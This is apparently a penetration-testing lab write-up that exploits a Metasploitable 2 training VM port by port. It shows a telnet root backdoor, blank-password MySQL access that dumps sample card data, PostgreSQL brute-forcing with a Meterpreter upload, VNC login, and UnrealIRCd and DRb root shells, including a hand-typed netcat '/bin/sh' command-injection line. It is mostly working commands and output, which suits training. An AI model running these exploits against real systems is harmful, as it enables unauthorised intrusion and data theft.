The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
1524/tcp  open  ingreslock?

Ingreslock was popular for adding a backdoor on to a compromised server.

The Nessus report had this to say on port 1524:

1524/tcp

Rogue Shell Backdoor Detection

Synopsis

The remote host may have been compromised.

Description

A shell is listening on the remote port, without any authentication. An attacker may use it by connecting to the remote port and sending commands directly.

And so we can test the backdoor connection in the attacking Terminal:

:~# telnet 192.168.1.103 1524
Trying 192.168.1.103...
Connected to 192.168.1.103.
Escape character is '^]'.
root@metasploitable:/#

Very simple.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5

The Nessus report on this port was very revealing; here is some of the information:

3306/tcp

MySQL Unpassworded Account Check

Synopsis

The remote database server can be accessed without a password.

Description

It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.

The ‘root’ account does not have a password.

Here is the list of databases on the remote server :

- information_schema
- dvwa
- metasploit
- mysql
- owasp10
- tikiwiki
- tikiwiki195

Version : 5.0.51a-3ubuntu5
Protocol : 10
Server Status : SERVER_STATUS_AUTOCOMMIT
Server Capabilities :
CLIENT_LONG_FLAG (Get all column flags)
CLIENT_CONNECT_WITH_DB (One can specify db on connect)
CLIENT_COMPRESS (Can use compression protocol)
CLIENT_PROTOCOL_41 (New 4.1 protocol)
CLIENT_SSL (Switch to SSL after handshake)
CLIENT_TRANSACTIONS (Client knows about transactions)
CLIENT_SECURE_CONNECTION (New 4.1 authentication)

The ‘root’ account does not have a password! So, let’s see if we can connect to the SQL database with the username root and a blank password.

~# mysql -h 192.168.1.103 -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

And there we have the database connection. Let’s have a look at the databases:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.01 sec)

Let’s choose mysql database and have a look at the tables:

mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
17 rows in set (0.00 sec)

Let’s have a look at users and their passwords:

mysql> select User, Password from user;
+------------------+----------+
| User             | Password |
+------------------+----------+
| debian-sys-maint |          |
| root             |          |
| guest            |          |
+------------------+----------+
3 rows in set (0.00 sec)

mysql>

So, three users without passwords we can use.
Let’s have a look at tables within another database:

mysql> show tables from owasp10;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts          |
| blogs_table       |
| captured_data     |
| credit_cards      |
| hitlog            |
| pen_test_tools    |
+-------------------+
6 rows in set (0.01 sec)

We’ll change database and have a look at credit card details:

mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from credit_cards;
+------+------------------+------+------------+
| ccid | ccnumber | ccv | expiration |
+------+------------------+------+------------+
| 1 | 4444111122223333 | 745 | 2012-03-01 |
| 2 | 7746536337776330 | 722 | 2015-04-01 |
| 3 | 8242325748474749 | 461 | 2016-03-01 |
| 4 | 7725653200487633 | 230 | 2017-06-01 |
| 5 | 1234567812345678 | 627 | 2018-11-01 |
+------+------------------+------+------------+
5 rows in set (0.03 sec)
mysql>

Hat-Tip to PentestLab for the MYSQL post exploitation.

Below is a SecurityTube video obtaining a root shell via Metasploit:

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 – 8.3.7

This exploit is straight forward brute force using Metasploit:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(postgres_login) > run

[*] 192.168.1.103:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'postgres':''
[-] 192.168.1.103:5432 Postgres - [01/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: '':''
[-] 192.168.1.103:5432 Postgres - [02/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'scott':''
[-] 192.168.1.103:5432 Postgres - [03/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'admin':''
[-] 192.168.1.103:5432 Postgres - [04/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.1.103:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.103:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

And there we have it; username and password are both postgres.

So let’s connect via the postgres client in the Terminal:

# psql -h 192.168.1.103 -U postgres -W
Password for user postgres: 
psql (9.1.9, server 8.3.1)
WARNING: psql version 9.1, server version 8.3.
         Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=# \l
                    List of databases
   Name    |  Owner   | Encoding |   Access privileges   
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8     | 
 template0 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
(3 rows)

postgres=#

Below is a video demonstrating the above with additional post exploitation maneuvers:

Now we have the password we can also use Metasploit to obtain a Meterpreter shell:

msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST     192.168.1.103    yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(postgres_payload) > set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
msf exploit(postgres_payload) > exploit

[*] Started bind handler
[*] 192.168.1.103:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/fTDEMbhY.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:49575 -> 192.168.1.103:4444) at 2013-11-20 08:04:41 +0000

meterpreter >

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5900/tcp  open  vnc         VNC (protocol 3.3)

The information online pertaining to exploiting this VNC service all use brute force techniques; however, the Nessus output for this port is revealing:

Port 5900/tcp
VNC Server ‘password’ Password

Synopsis
A VNC server running on the remote host is secured with a weak password.

Description
The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of ‘password’. A remote, unauthenticated attacker could exploit this to take control of the system.

Solution
Secure the VNC service with a strong password.

Risk Factor
Critical

CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

Plugin Information:
Publication date: 2012/08/29, Modification date: 2012/08/29

Ports
tcp/5900

Nessus logged in using a password of “password”.

As we can see Nessus has done all the hard work discovering the VNC password is password.

All that’s left for us to do is to log in to the VNC service via the attacking Terminal:

# vncviewer 192.168.1.103
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

And up pops the virtual desktop:

It’s worth noting at the outset of this post that I was unsuccessful in exploiting this X11 service, but will document my efforts nonetheless.

The Nmap scan of Metasploitable 2 revealed:

PORT STATE SERVICE VERSION
6000/tcp open X11 (access denied)

The Nessus scan on this port detailed the following:

Port 6000/tcp
10407 – X Server Detection     [-/+]

Synopsis
An X11 server is listening on the remote host

Description
The remote host is running an X11 server. X11 is a client-server protocol that can be used to display graphical applications running on a given host on a remote client.

Since the X11 traffic is not ciphered, it is possible for an attacker to eavesdrop on the connection.

Solution
Restrict access to this port. If the X11 client/server facility is not used, disable TCP support in X11 entirely (-nolisten tcp).

So Nessus is reporting the possibility of sniffing traffic. We can scan this service using Metasploit:

msf exploit(postgres_payload) > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > show options

Module options (auxiliary/scanner/x11/open_x11):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(open_x11) > exploit

[*] 192.168.1.103 Access Denied
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(open_x11) >

Metasploit is reporting “access denied”.

Everything I’ve read online relating to exploiting this service relies on open authentication, which in this instance does not appear to be the case.

The Metasploit: The Penetration Tester’s Guide advises using the xspy sniffing tool to detect keystrokes, as the X system handles the GUI including the mouse and keyborad; however, again, this relies on unauthenticated access to the system and so as expected this technique failed:

# xspy 192.168.1.103
Client is not authorized to connect to Serverxspy: can't open display 192.168.1.103:0
blah....

# xspy -display 192.168.1.103 -delay 100 -up
xspy: can't open display -display:0
blah....

As I’m not sure how to progress this one; I admit defeat at this point.

The Nmap scan of Metasploitable 2 revealed:

PORT STATE SERVICE VERSION
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd

UnreaIRCD is an Internet Relay Chat service.

This exploit has been made nice and easy for us:

On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went unnoticed for months – triggered by sending the letters “AB” following by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.

Source

The Nessus scan reported:

Port 6667/tcp

46882 – UnrealIRCd Backdoor Detection [-/+]

Synopsis
The remote IRC server contains a backdoor.

Description
The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host.

See Also
http://seclists.org/fulldisclosure/2010/Jun/277
http://seclists.org/fulldisclosure/2010/Jun/284
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Solution
Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.

Risk Factor
Critical

CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

References
BID 40820
CVE CVE-2010-2075
XREF OSVDB:65445

Exploitable with
CANVAS (true)Metasploit (true)

Plugin Information:
Publication date: 2010/06/14, Modification date: 2013/02/06
Ports
tcp/6667

The remote IRC server is running as :

uid=0(root) gid=0(root)

As this Nessus scan advises us that this is exploitable via Metasploit, let’s give it a go:

msf > search ircd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.1.103:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo kt8lsphf0nxKGdOA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "kt8lsphf0nxKGdOA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:39851) at 2013-11-20 12:33:44 +0000

whoami
root

Success.

As this exploit is triggered by sending the letters “AB” following by a system command to the server on any listening port, we can achieve root manually using Ncat. In the Terminal we input:

# echo "AB;nc -l -e /bin/sh -p 12345" | ncat 192.168.1.103 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached)

Then we open Ncat and connect to the backdoor using another terminal:

# ncat 192.168.1.103 12345
whoami
root

Job done.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
8787/tcp  open  unknown

As we can see this Nmap scan did not recognise the service signature running on port 8787 and so I threw a more robust Nmap version detection scan at this:

~# nmap -p 8787 -sV --version-all 192.168.1.103

Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-20 14:03 GMT
Nmap scan report for Unknown-00:0c:29:72:05:d6.home (192.168.1.103)
Host is up (0.081s latency).
PORT     STATE SERVICE VERSION
8787/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port8787-TCP:V=6.25%I=9%D=11/20%Time=528CC14C%P=x86_64-unknown-linux-gn
SF:u%r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb:
SF::DRbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\
SF:x20`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/
SF:usr/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"

The service is still unknown; however, we have some interesting output within the fingerprint which indicates a Ruby program and "DRB" (Distributed Ruby Service) which we can use as a search term within Metasploit:

msf > search drb
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                                   Disclosure Date  Rank       Description
   ----                                                   ---------------  ----       -----------
   exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  Distributed Ruby Send instance_eval/syscall Code Execution
   exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)

The drb_remote_codeexec is the most promising and so we’ll run with that:

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   URI                    yes       The dRuby URI of the target host (druby://host:port)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(drb_remote_codeexec) > set URI "druby://192.168.1.103:8787"
URI => druby://192.168.1.103:8787
msf exploit(drb_remote_codeexec) > exploit

[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[*] payload executed from file .EbA8isJbAjsgcmD8
[*] make sure to remove that file
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo en2vfxLYQpig5Eku;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "en2vfxLYQpig5Eku\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.70:4444 -> 192.168.1.103:47082) at 2013-11-20 16:26:55 +0000

whoami
root

And we have root.